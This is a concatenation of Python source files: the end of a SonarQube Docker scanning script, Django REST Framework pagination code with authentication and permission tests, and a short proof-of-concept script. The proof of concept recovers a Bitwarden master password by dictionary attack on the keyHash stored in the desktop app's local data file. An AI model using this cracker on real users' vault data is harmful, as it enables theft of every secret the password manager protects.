def stop(self):
print('Stopping SonarQube server')
return self.client.containers.get(server_name).stop()
def kill(self):
print('Removing SonarQube server')
return self.client.containers.get(server_name).remove(force=True)
#argparse TODO:
# scan even if not a git repo
# password for server
parser = argparse.ArgumentParser(description='Local sonarqube scanning.')
parser.add_argument('-n', '--project-name',
help='Project name to use in SonarQube, defaults to code folder name')
parser.add_argument('--ip', default='127.0.0.1',
help='Local host IP to bind to, defaults to 127.0.0.1.')
parser.add_argument('--port', default='9000',
help='Local host port to bind to, defaults to 9000.')
parser.add_argument('-p', '--pull', action='store_true',
help='Get the docker mages used by sonarq')
parser.add_argument('--stop-server', action='store_true',
help="Stop the server")
parser.add_argument('--kill-server', action='store_true',
help="Destroy the server")
parser.add_argument('path', nargs='?')
args = parser.parse_args()
infra = Infra()
if args.kill_server:
infra.kill()
exit(0)
if args.stop_server:
infra.stop()
exit(0)
if args.pull:
infra.pull()
exit(0)
if not args.path:
parser.error('Must specify a code path')
code_path = os.path.abspath(args.path)
if args.project_name:
project_name = args.project_name
else:
project_name = os.path.basename(os.path.normpath(code_path))
host_ip = args.ip
host_port = args.port
#TODO check code path exists and is a git repo
print(f'Beginning sonarq tasks for the path {code_path}')
#check docker network, create if non existent
infra.check_network()
#check server status, run or start if needed if not found
start_time = int(datetime.now(tz=timezone.utc).timestamp())
state = infra.server_status()
if state != 'running':
if not state:
container = infra.run_server()
time.sleep(20)
elif state == 'exited':
infra.start_server()
time.sleep(15)
container = infra.client.containers.get(server_name)
while True:
if infra.server_status() == 'running':
logs = str(container.logs(since=start_time))
if 'SonarQube is up' in logs:
break
else:
time.sleep(3)
#auth to server
s = SonarQubeClient(sonarqube_url=f'http://{host_ip}:{host_port}', username=server_user, password=<PASSWORD>)
print(f'SonarQube server is available at http://{host_ip}:{host_port}')
#Create a token
sonar_tokens = s.user_tokens.search_user_tokens(user_login=server_user)
for i in sonar_tokens:
if i['name'] == project_name:
s.user_tokens.revoke_user_token(project_name, user_login=server_user)
sonar_token = s.user_tokens.generate_user_token(project_name, user_login=server_user).json()['token']
#check if project exists in sonar, create if not
project = list(s.projects.search_projects(projects=project_name))
if len(project) < 1:
print(f'Creating a new SonarQube project named {project_name}')
project = s.projects.create_project(project=project_name, name=project_name, visibility='private')
else:
print(f'Using existing SonarQube project {project_name}')
project = project[0]
#run the scan
infra.run_scan(code_path, project_name, sonar_token)
#output the link to the project
print('Scan complete. Results are available at the following url (user/pass = admin/admin)')
print(f'\nhttp://{host_ip}:{host_port}/dashboard?id={project_name}\n')
#TODO: output the main stats
``` |
{
"source": "0x6470/poc_Bitwarden2Hashcat",
"score": 3
} |
#### File: 0x6470/poc_Bitwarden2Hashcat/main.py
```python
import hashlib
import json
import base64
def crack(email, keyHash, iterations, wordlist):
email = email.lower().encode() # make email lowercase and encode it to utf-8 (byte string)
wordlist = [i.rstrip("\n") for i in open(wordlist)] # convert wordlist to array
for passphrase in wordlist:
passphrase = passphrase.encode()
pepper = hashlib.pbkdf2_hmac("sha256", passphrase, email, iterations, None)
possibleKeyHash = hashlib.pbkdf2_hmac("sha256", pepper, passphrase, 1, None) # change from 1 to 2 for the new version
possibleKeyHash = base64.b64encode(possibleKeyHash).decode() # base64 encode possibleKeyHash and make it a regular string
if possibleKeyHash == keyHash:
return "Found password: {} : {}".format(keyHash, passphrase.decode())
def getData():
with open("data.json") as f: # some unnecessary entries were removed, retrieved from Windows 10 App, found in %userprofile%\AppData\Local\Packages\8bitSolutionsLLC.bitwardendesktop_h4e712dmw3xyy\LocalCache\Roaming\Bitwarden
data = json.load(f)
email = data["userEmail"] # 10minutemail.com
keyHash = data["keyHash"]
iterations = data["kdfIterations"]
return email, keyHash, iterations
print(crack(*getData(), "wordlist.txt"))
# correct password: <PASSWORD>
``` |
{
"source": "0x64746b/django-rest-framework",
"score": 3
} |
#### File: django-rest-framework/rest_framework/pagination.py
```python
from __future__ import unicode_literals
from rest_framework import serializers
from rest_framework.templatetags.rest_framework import replace_query_param
class NextPageField(serializers.Field):
"""
Field that returns a link to the next page in paginated results.
"""
page_field = 'page'
def to_native(self, value):
if not value.has_next():
return None
page = value.next_page_number()
request = self.context.get('request')
url = request and request.build_absolute_uri() or ''
return replace_query_param(url, self.page_field, page)
class PreviousPageField(serializers.Field):
"""
Field that returns a link to the previous page in paginated results.
"""
page_field = 'page'
def to_native(self, value):
if not value.has_previous():
return None
page = value.previous_page_number()
request = self.context.get('request')
url = request and request.build_absolute_uri() or ''
return replace_query_param(url, self.page_field, page)
class DefaultObjectSerializer(serializers.Field):
"""
If no object serializer is specified, then this serializer will be applied
as the default.
"""
def __init__(self, source=None, context=None):
# Note: Swallow context kwarg - only required for eg. ModelSerializer.
super(DefaultObjectSerializer, self).__init__(source=source)
class PaginationSerializerOptions(serializers.SerializerOptions):
"""
An object that stores the options that may be provided to a
pagination serializer by using the inner `Meta` class.
Accessible on the instance as `serializer.opts`.
"""
def __init__(self, meta):
super(PaginationSerializerOptions, self).__init__(meta)
self.object_serializer_class = getattr(meta, 'object_serializer_class',
DefaultObjectSerializer)
class BasePaginationSerializer(serializers.Serializer):
"""
A base class for pagination serializers to inherit from,
to make implementing custom serializers more easy.
"""
_options_class = PaginationSerializerOptions
results_field = 'results'
def __init__(self, *args, **kwargs):
"""
Override init to add in the object serializer field on-the-fly.
"""
super(BasePaginationSerializer, self).__init__(*args, **kwargs)
results_field = self.results_field
object_serializer = self.opts.object_serializer_class
if 'context' in kwargs:
context_kwarg = {'context': kwargs['context']}
else:
context_kwarg = {}
self.fields[results_field] = object_serializer(source='object_list', **context_kwarg)
class PaginationSerializer(BasePaginationSerializer):
"""
A default implementation of a pagination serializer.
"""
count = serializers.Field(source='paginator.count')
next = NextPageField(source='*')
previous = PreviousPageField(source='*')
```
#### File: rest_framework/tests/test_authentication.py
```python
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.test import Client, TestCase
from django.utils import unittest
from rest_framework import HTTP_HEADER_ENCODING
from rest_framework import exceptions
from rest_framework import permissions
from rest_framework import renderers
from rest_framework.response import Response
from rest_framework import status
from rest_framework.authentication import (
BaseAuthentication,
TokenAuthentication,
BasicAuthentication,
SessionAuthentication,
OAuthAuthentication,
OAuth2Authentication
)
from rest_framework.authtoken.models import Token
from rest_framework.compat import patterns, url, include
from rest_framework.compat import oauth2_provider, oauth2_provider_models, oauth2_provider_scope
from rest_framework.compat import oauth, oauth_provider
from rest_framework.tests.utils import RequestFactory
from rest_framework.views import APIView
import json
import base64
import time
import datetime
factory = RequestFactory()
class MockView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
def post(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
def put(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
urlpatterns = patterns('',
(r'^session/$', MockView.as_view(authentication_classes=[SessionAuthentication])),
(r'^basic/$', MockView.as_view(authentication_classes=[BasicAuthentication])),
(r'^token/$', MockView.as_view(authentication_classes=[TokenAuthentication])),
(r'^auth-token/$', 'rest_framework.authtoken.views.obtain_auth_token'),
(r'^oauth/$', MockView.as_view(authentication_classes=[OAuthAuthentication])),
(r'^oauth-with-scope/$', MockView.as_view(authentication_classes=[OAuthAuthentication],
permission_classes=[permissions.TokenHasReadWriteScope]))
)
if oauth2_provider is not None:
urlpatterns += patterns('',
url(r'^oauth2/', include('provider.oauth2.urls', namespace='oauth2')),
url(r'^oauth2-test/$', MockView.as_view(authentication_classes=[OAuth2Authentication])),
url(r'^oauth2-with-scope-test/$', MockView.as_view(authentication_classes=[OAuth2Authentication],
permission_classes=[permissions.TokenHasReadWriteScope])),
)
class BasicAuthTests(TestCase):
"""Basic authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
def test_post_form_passing_basic_auth(self):
"""Ensure POSTing json over basic auth with correct credentials passes and does not require CSRF"""
credentials = ('%s:%s' % (self.username, self.password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
auth = 'Basic %s' % base64_credentials
response = self.csrf_client.post('/basic/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_json_passing_basic_auth(self):
"""Ensure POSTing form over basic auth with correct credentials passes and does not require CSRF"""
credentials = ('%s:%s' % (self.username, self.password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
auth = 'Basic %s' % base64_credentials
response = self.csrf_client.post('/basic/', json.dumps({'example': 'example'}), 'application/json', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_failing_basic_auth(self):
"""Ensure POSTing form over basic auth without correct credentials fails"""
response = self.csrf_client.post('/basic/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_failing_basic_auth(self):
"""Ensure POSTing json over basic auth without correct credentials fails"""
response = self.csrf_client.post('/basic/', json.dumps({'example': 'example'}), 'application/json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response['WWW-Authenticate'], 'Basic realm="api"')
class SessionAuthTests(TestCase):
"""User session authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.non_csrf_client = Client(enforce_csrf_checks=False)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
def tearDown(self):
self.csrf_client.logout()
def test_post_form_session_auth_failing_csrf(self):
"""
Ensure POSTing form over session authentication without CSRF token fails.
"""
self.csrf_client.login(username=self.username, password=self.password)
response = self.csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_post_form_session_auth_passing(self):
"""
Ensure POSTing form over session authentication with logged in user and CSRF token passes.
"""
self.non_csrf_client.login(username=self.username, password=self.password)
response = self.non_csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_put_form_session_auth_passing(self):
"""
Ensure PUTting form over session authentication with logged in user and CSRF token passes.
"""
self.non_csrf_client.login(username=self.username, password=self.password)
response = self.non_csrf_client.put('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_session_auth_failing(self):
"""
Ensure POSTing form over session authentication without logged in user fails.
"""
response = self.csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TokenAuthTests(TestCase):
"""Token authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.key = '<KEY>'
self.token = Token.objects.create(key=self.key, user=self.user)
def test_post_form_passing_token_auth(self):
"""Ensure POSTing json over token auth with correct credentials passes and does not require CSRF"""
auth = 'Token ' + self.key
response = self.csrf_client.post('/token/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_json_passing_token_auth(self):
"""Ensure POSTing form over token auth with correct credentials passes and does not require CSRF"""
auth = "Token " + self.key
response = self.csrf_client.post('/token/', json.dumps({'example': 'example'}), 'application/json', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_failing_token_auth(self):
"""Ensure POSTing form over token auth without correct credentials fails"""
response = self.csrf_client.post('/token/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_failing_token_auth(self):
"""Ensure POSTing json over token auth without correct credentials fails"""
response = self.csrf_client.post('/token/', json.dumps({'example': 'example'}), 'application/json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_token_has_auto_assigned_key_if_none_provided(self):
"""Ensure creating a token with no key will auto-assign a key"""
self.token.delete()
token = Token.objects.create(user=self.user)
self.assertTrue(bool(token.key))
def test_token_login_json(self):
"""Ensure token login view using JSON POST works."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
json.dumps({'username': self.username, 'password': <PASSWORD>}), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content.decode('ascii'))['token'], self.key)
def test_token_login_json_bad_creds(self):
"""Ensure token login view using JSON POST fails if bad credentials are used."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
json.dumps({'username': self.username, 'password': "<PASSWORD>"}), 'application/json')
self.assertEqual(response.status_code, 400)
def test_token_login_json_missing_fields(self):
"""Ensure token login view using JSON POST fails if missing fields."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
json.dumps({'username': self.username}), 'application/json')
self.assertEqual(response.status_code, 400)
def test_token_login_form(self):
"""Ensure token login view using form POST works."""
client = Client(enforce_csrf_checks=True)
response = client.post('/auth-token/',
{'username': self.username, 'password': self.password})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content.decode('ascii'))['token'], self.key)
class IncorrectCredentialsTests(TestCase):
def test_incorrect_credentials(self):
"""
If a request contains bad authentication credentials, then
authentication should run and error, even if no permissions
are set on the view.
"""
class IncorrectCredentialsAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('Bad credentials')
request = factory.get('/')
view = MockView.as_view(
authentication_classes=(IncorrectCredentialsAuth,),
permission_classes=()
)
response = view(request)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(response.data, {'detail': 'Bad credentials'})
class OAuthTests(TestCase):
"""OAuth 1.0a authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
# these imports are here because oauth is optional and hiding them in try..except block or compat
# could obscure problems if something breaks
from oauth_provider.models import Consumer, Resource
from oauth_provider.models import Token as OAuthToken
from oauth_provider import consts
self.consts = consts
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.CONSUMER_KEY = 'consumer_key'
self.CONSUMER_SECRET = 'consumer_secret'
self.TOKEN_KEY = "token_key"
self.TOKEN_SECRET = "token_secret"
self.consumer = Consumer.objects.create(key=self.CONSUMER_KEY, secret=self.CONSUMER_SECRET,
name='example', user=self.user, status=self.consts.ACCEPTED)
self.resource = Resource.objects.create(name="resource name", url="api/")
self.token = OAuthToken.objects.create(user=self.user, consumer=self.consumer, resource=self.resource,
token_type=OAuthToken.ACCESS, key=self.TOKEN_KEY, secret=self.TOKEN_SECRET, is_approved=True
)
def _create_authorization_header(self):
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="GET", url="http://example.com", parameters=params)
signature_method = oauth.SignatureMethod_PLAINTEXT()
req.sign_request(signature_method, self.consumer, self.token)
return req.to_header()["Authorization"]
def _create_authorization_url_parameters(self):
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="GET", url="http://example.com", parameters=params)
signature_method = oauth.SignatureMethod_PLAINTEXT()
req.sign_request(signature_method, self.consumer, self.token)
return dict(req)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_passing_oauth(self):
"""Ensure POSTing form over OAuth with correct credentials passes and does not require CSRF"""
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_repeated_nonce_failing_oauth(self):
"""Ensure POSTing form over OAuth with repeated auth (same nonces and timestamp) credentials fails"""
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
# simulate reply attack auth header containes already used (nonce, timestamp) pair
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_token_removed_failing_oauth(self):
"""Ensure POSTing when there is no OAuth access token in db fails"""
self.token.delete()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_consumer_status_not_accepted_failing_oauth(self):
"""Ensure POSTing when consumer status is anything other than ACCEPTED fails"""
for consumer_status in (self.consts.CANCELED, self.consts.PENDING, self.consts.REJECTED):
self.consumer.status = consumer_status
self.consumer.save()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_request_token_failing_oauth(self):
"""Ensure POSTing with unauthorized request token instead of access token fails"""
self.token.token_type = self.token.REQUEST
self.token.save()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_urlencoded_parameters(self):
"""Ensure POSTing with x-www-form-urlencoded auth parameters passes"""
params = self._create_authorization_url_parameters()
response = self.csrf_client.post('/oauth/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_get_form_with_url_parameters(self):
"""Ensure GETing with auth in url parameters passes"""
params = self._create_authorization_url_parameters()
response = self.csrf_client.get('/oauth/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_hmac_sha1_signature_passes(self):
"""Ensure POSTing using HMAC_SHA1 signature method passes"""
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="POST", url="http://testserver/oauth/", parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, self.consumer, self.token)
auth = req.to_header()["Authorization"]
response = self.csrf_client.post('/oauth/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_get_form_with_readonly_resource_passing_auth(self):
"""Ensure POSTing with a readonly resource instead of a write scope fails"""
read_only_access_token = self.token
read_only_access_token.resource.is_readonly = True
read_only_access_token.resource.save()
params = self._create_authorization_url_parameters()
response = self.csrf_client.get('/oauth-with-scope/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_readonly_resource_failing_auth(self):
"""Ensure POSTing with a readonly resource instead of a write scope fails"""
read_only_access_token = self.token
read_only_access_token.resource.is_readonly = True
read_only_access_token.resource.save()
params = self._create_authorization_url_parameters()
response = self.csrf_client.post('/oauth-with-scope/', params)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_post_form_with_write_resource_passing_auth(self):
"""Ensure POSTing with a write resource succeed"""
read_write_access_token = self.token
read_write_access_token.resource.is_readonly = False
read_write_access_token.resource.save()
params = self._create_authorization_url_parameters()
response = self.csrf_client.post('/oauth-with-scope/', params)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_bad_consumer_key(self):
"""Ensure POSTing using HMAC_SHA1 signature method passes"""
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': self.token.key,
'oauth_consumer_key': 'badconsumerkey'
}
req = oauth.Request(method="POST", url="http://testserver/oauth/", parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, self.consumer, self.token)
auth = req.to_header()["Authorization"]
response = self.csrf_client.post('/oauth/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth_provider, 'django-oauth-plus not installed')
@unittest.skipUnless(oauth, 'oauth2 not installed')
def test_bad_token_key(self):
"""Ensure POSTing using HMAC_SHA1 signature method passes"""
params = {
'oauth_version': "1.0",
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time()),
'oauth_token': '<PASSWORD>',
'oauth_consumer_key': self.consumer.key
}
req = oauth.Request(method="POST", url="http://testserver/oauth/", parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, self.consumer, self.token)
auth = req.to_header()["Authorization"]
response = self.csrf_client.post('/oauth/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
class OAuth2Tests(TestCase):
"""OAuth 2.0 authentication"""
urls = 'rest_framework.tests.test_authentication'
def setUp(self):
self.csrf_client = Client(enforce_csrf_checks=True)
self.username = 'john'
self.email = '<EMAIL>'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.CLIENT_ID = 'client_key'
self.CLIENT_SECRET = 'client_secret'
self.ACCESS_TOKEN = "access_token"
self.REFRESH_TOKEN = "refresh_token"
self.oauth2_client = oauth2_provider_models.Client.objects.create(
client_id=self.CLIENT_ID,
client_secret=self.CLIENT_SECRET,
redirect_uri='',
client_type=0,
name='example',
user=None,
)
self.access_token = oauth2_provider_models.AccessToken.objects.create(
token=self.ACCESS_TOKEN,
client=self.oauth2_client,
user=self.user,
)
self.refresh_token = oauth2_provider_models.RefreshToken.objects.create(
user=self.user,
access_token=self.access_token,
client=self.oauth2_client
)
def _create_authorization_header(self, token=None):
return "Bearer {0}".format(token or self.access_token.token)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_with_wrong_authorization_header_token_type_failing(self):
"""Ensure that a wrong token type lead to the correct HTTP error status code"""
auth = "<PASSWORD>"
response = self.csrf_client.get('/oauth2-test/', {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_with_wrong_authorization_header_token_format_failing(self):
"""Ensure that a wrong token format lead to the correct HTTP error status code"""
auth = "<PASSWORD>"
response = self.csrf_client.get('/oauth2-test/', {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_with_wrong_authorization_header_token_failing(self):
"""Ensure that a wrong token lead to the correct HTTP error status code"""
auth = "<PASSWORD>"
response = self.csrf_client.get('/oauth2-test/', {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 401)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_get_form_passing_auth(self):
"""Ensure GETing form over OAuth with correct client credentials succeed"""
auth = self._create_authorization_header()
response = self.csrf_client.get('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_passing_auth(self):
"""Ensure POSTing form over OAuth with correct credentials passes and does not require CSRF"""
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_token_removed_failing_auth(self):
"""Ensure POSTing when there is no OAuth access token in db fails"""
self.access_token.delete()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_refresh_token_failing_auth(self):
"""Ensure POSTing with refresh token instead of access token fails"""
auth = self._create_authorization_header(token=self.refresh_token.token)
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_expired_access_token_failing_auth(self):
"""Ensure POSTing with expired access token fails with an 'Invalid token' error"""
self.access_token.expires = datetime.datetime.now() - datetime.timedelta(seconds=10) # 10 seconds late
self.access_token.save()
auth = self._create_authorization_header()
response = self.csrf_client.post('/oauth2-test/', HTTP_AUTHORIZATION=auth)
self.assertIn(response.status_code, (status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN))
self.assertIn('Invalid token', response.content)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_invalid_scope_failing_auth(self):
"""Ensure POSTing with a readonly scope instead of a write scope fails"""
read_only_access_token = self.access_token
read_only_access_token.scope = oauth2_provider_scope.SCOPE_NAME_DICT['read']
read_only_access_token.save()
auth = self._create_authorization_header(token=read_only_access_token.token)
response = self.csrf_client.get('/oauth2-with-scope-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
response = self.csrf_client.post('/oauth2-with-scope-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@unittest.skipUnless(oauth2_provider, 'django-oauth2-provider not installed')
def test_post_form_with_valid_scope_passing_auth(self):
"""Ensure POSTing with a write scope succeed"""
read_write_access_token = self.access_token
read_write_access_token.scope = oauth2_provider_scope.SCOPE_NAME_DICT['write']
read_write_access_token.save()
auth = self._create_authorization_header(token=read_write_access_token.token)
response = self.csrf_client.post('/oauth2-with-scope-test/', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, 200)
class FailingAuthAccessedInRenderer(TestCase):
def setUp(self):
class AuthAccessingRenderer(renderers.BaseRenderer):
media_type = 'text/plain'
format = 'txt'
def render(self, data, media_type=None, renderer_context=None):
request = renderer_context['request']
if request.user.is_authenticated():
return b'authenticated'
return b'not authenticated'
class FailingAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('authentication failed')
class ExampleView(APIView):
authentication_classes = (FailingAuth,)
renderer_classes = (AuthAccessingRenderer,)
def get(self, request):
return Response({'foo': 'bar'})
self.view = ExampleView.as_view()
def test_failing_auth_accessed_in_renderer(self):
"""
When authentication fails the renderer should still be able to access
`request.user` without raising an exception. Particularly relevant
to HTML responses that might reasonably access `request.user`.
"""
request = factory.get('/')
response = self.view(request)
content = response.render().content
self.assertEqual(content, b'not authenticated')
```
#### File: rest_framework/tests/test_permissions.py
```python
from __future__ import unicode_literals
from django.contrib.auth.models import User, Permission
from django.db import models
from django.test import TestCase
from rest_framework import generics, status, permissions, authentication, HTTP_HEADER_ENCODING
from rest_framework.tests.utils import RequestFactory
import base64
import json
factory = RequestFactory()
class BasicModel(models.Model):
text = models.CharField(max_length=100)
class RootView(generics.ListCreateAPIView):
model = BasicModel
authentication_classes = [authentication.BasicAuthentication]
permission_classes = [permissions.DjangoModelPermissions]
class InstanceView(generics.RetrieveUpdateDestroyAPIView):
model = BasicModel
authentication_classes = [authentication.BasicAuthentication]
permission_classes = [permissions.DjangoModelPermissions]
root_view = RootView.as_view()
instance_view = InstanceView.as_view()
def basic_auth_header(username, password):
credentials = ('%s:%s' % (username, password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
return 'Basic %s' % base64_credentials
class ModelPermissionsIntegrationTests(TestCase):
def setUp(self):
User.objects.create_user('disallowed', '<EMAIL>', 'password')
